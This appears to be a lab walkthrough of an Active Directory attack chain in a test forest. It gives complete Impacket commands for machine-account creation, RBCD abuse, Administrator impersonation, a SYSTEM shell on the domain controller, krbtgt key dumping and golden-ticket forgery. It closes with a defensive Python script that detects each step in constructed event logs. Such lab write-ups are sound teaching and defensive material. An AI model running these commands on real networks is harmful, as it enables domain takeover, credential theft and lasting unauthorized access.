In Part 1, we set the stage. Now we turn that control into dominance.

The goal here is simple. Move from a compromised machine account in the child domain north.sevenkingdoms.local to full Enterprise Admin access in the forest root sevenkingdoms.local.

Phase 0: Creating a Controlled Machine Account

Before RBCD, we need a machine account we control. By default, ms-DS-MachineAccountQuota lets any authenticated user join up to 10 computers to the domain, so many domains allow ordinary users to create new computer objects. Using arya.stark's credentials, we create NEEDLE-TEST$ with a password we know:

python3 /usr/share/doc/python3-impacket/examples/addcomputer.py \
  -computer-name 'NEEDLE-TEST$' \
  -computer-pass 'Password123!' \
  -dc-ip 192.168.66.11 \
  'north.sevenkingdoms.local/arya.stark:Needle'

Now we can use NEEDLE-TEST$ as the controlled principal for RBCD and ticket requests.

Phase 1: Resource-Based Constrained Delegation (RBCD)

Now we abuse RBCD so that NEEDLE-TEST$, the system we control, can impersonate any user when authenticating to the domain controller.

1. Granting Delegation Rights

We write NEEDLE-TEST$ into the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of WINTERFELL$, so our compromised machine account can act on behalf of other users when authenticating to WINTERFELL. This step only works because jon.snow has write access to the WINTERFELL computer object; a principal without that right cannot set the attribute.

python3 /usr/share/doc/python3-impacket/examples/rbcd.py -delegate-to 'WINTERFELL$' -delegate-from 'NEEDLE-TEST$' -action 'write' -dc-ip 192.168.66.11 'north.sevenkingdoms.local/jon.snow:iknownothing'


At this point, WINTERFELL trusts a system we control.

2. Impersonating the Administrator

Next, we use S4U2Self followed by S4U2Proxy to request a service ticket for the CIFS service on WINTERFELL, impersonating the domain Administrator.

python3 /usr/share/doc/python3-impacket/examples/getST.py -spn 'cifs/WINTERFELL.north.sevenkingdoms.local' -impersonate Administrator -dc-ip 192.168.66.11 north/NEEDLE-TEST$:Password123!

We now hold a valid Kerberos service ticket as Administrator.

3. Gaining a SYSTEM Shell

We point KRB5CCNAME at the saved ticket and use it with Kerberos authentication (-k -no-pass) to execute remotely.

export KRB5CCNAME=Administrator.ccache
python3 /usr/share/doc/python3-impacket/examples/psexec.py -k -no-pass NORTH.SEVENKINGDOMS.LOCAL/Administrator@winterfell.north.sevenkingdoms.local

This drops us into a SYSTEM shell on the domain controller.

Phase 2: Domain Persistence (Golden Ticket)

Privilege is not enough. We want persistence.

From the domain controller, we extract the krbtgt account keys. Modern environments that have disabled RC4 require the AES key rather than the NT hash.

1. Extracting the KRBTGT Keys

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -k -no-pass -just-dc north.sevenkingdoms.local/administrator@winterfell.north.sevenkingdoms.local | grep krbtgt

We extract the AES256 key for krbtgt. This lets us mint long-lived tickets for the domain.

2. Forging the 10-Year Golden Ticket

Using the krbtgt AES key and the domain SID, we forge a long-lived Kerberos ticket.

python3 /usr/share/doc/python3-impacket/examples/ticketer.py -aesKey c3fa9b0e01e744dfa3ad7d33e173bd16c889f0556ce40b292ced2c0b53221a7e -domain-sid S-1-5-21-3995002436-1582307507-150598601 -domain north.sevenkingdoms.local -user-id 500 Administrator

Expiration is no longer relevant, since the ticket lifetime is chosen by the forger (ticketer.py defaults to ten years). Changing the Administrator password does not matter either; only resetting the krbtgt password twice invalidates the forged ticket.

Persistence in the domain is established.

We verify access by interacting with the DC over SMB.

python3 smbclient.py -k -no-pass winterfell.north.sevenkingdoms.local
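As an added defensive example (not part of the original post), the following Python runs detection rules for this chain over constructed Windows Security event records: a computer object created by a non-privileged user (4741, the MachineAccountQuota step), a write to msDS-AllowedToActOnBehalfOfOtherIdentity (5136, the RBCD step), a service ticket request whose TransitedServices field names the delegating account (4769, S4U2Proxy), and a service ticket with no preceding TGT request from the same host, which is how a forged TGT presents itself. The sample events, field names and privileged-account list are assumptions and simplifications of the real log schema.

```python
"""Detection rules for the RBCD / golden-ticket chain, run over constructed events.
Event IDs: 4741 computer account created, 5136 directory object modified
(requires Directory Service Changes auditing and a SACL on the object),
4768 TGT requested, 4769 service ticket requested."""
from collections import defaultdict

# Constructed sample events (not real logs); keys are simplified Security-log field names.
EVENTS = [
    {"id": 4741, "subject": "arya.stark", "target": "NEEDLE-TEST$"},
    {"id": 5136, "subject": "jon.snow", "object": "CN=WINTERFELL,OU=Domain Controllers,DC=north,DC=sevenkingdoms,DC=local",
     "attribute": "msDS-AllowedToActOnBehalfOfOtherIdentity"},
    {"id": 4769, "account": "Administrator", "service": "WINTERFELL$",
     "transited": "NEEDLE-TEST$@NORTH.SEVENKINGDOMS.LOCAL", "src_ip": "192.168.66.50"},
    {"id": 4769, "account": "Administrator", "service": "WINTERFELL$", "transited": "", "src_ip": "192.168.66.50"},
    {"id": 4768, "account": "sansa.stark", "src_ip": "192.168.66.20"},
    {"id": 4769, "account": "sansa.stark", "service": "WINTERFELL$", "transited": "", "src_ip": "192.168.66.20"},
]

# Assumption: accounts that are expected to create computer objects; everyone else is suspicious.
PRIVILEGED = {"administrator"}
RBCD_ATTR = "msds-allowedtoactonbehalfofotheridentity"


def detect(events):
    """Return a list of (rule, detail) findings in event order."""
    findings = []
    tgt_seen = defaultdict(set)  # src_ip -> accounts that requested a TGT (4768) earlier in the window
    for e in events:
        eid = e["id"]
        if eid == 4741 and e["subject"].lower() not in PRIVILEGED:
            # Ordinary user exercising ms-DS-MachineAccountQuota.
            findings.append(("machine-account-quota", f"{e['subject']} created {e['target']}"))
        elif eid == 5136 and e.get("attribute", "").lower() == RBCD_ATTR:
            # Delegation attribute written on a computer object (here, a domain controller).
            findings.append(("rbcd-write", f"{e['subject']} changed delegation on {e['object']}"))
        elif eid == 4768:
            tgt_seen[e["src_ip"]].add(e["account"].lower())
        elif eid == 4769:
            if e.get("transited"):
                # Non-empty TransitedServices means the ticket came via S4U2Proxy on behalf of another account.
                findings.append(("s4u2proxy", f"{e['transited']} obtained ticket as {e['account']} to {e['service']}"))
            elif e["account"].lower() not in tgt_seen[e["src_ip"]]:
                # A TGS-REQ without any AS-REQ from the same host: consistent with a forged (golden) TGT.
                findings.append(("tgs-without-as-req", f"{e['account']} from {e['src_ip']} has no TGT request in window"))
    return findings


if __name__ == "__main__":
    for rule, detail in detect(EVENTS):
        print(f"[{rule}] {detail}")
```

The last rule is a heuristic: a legitimate client whose TGT was issued before the log window also has no 4768 in view, so correlate over a window at least as long as the domain's TGT lifetime.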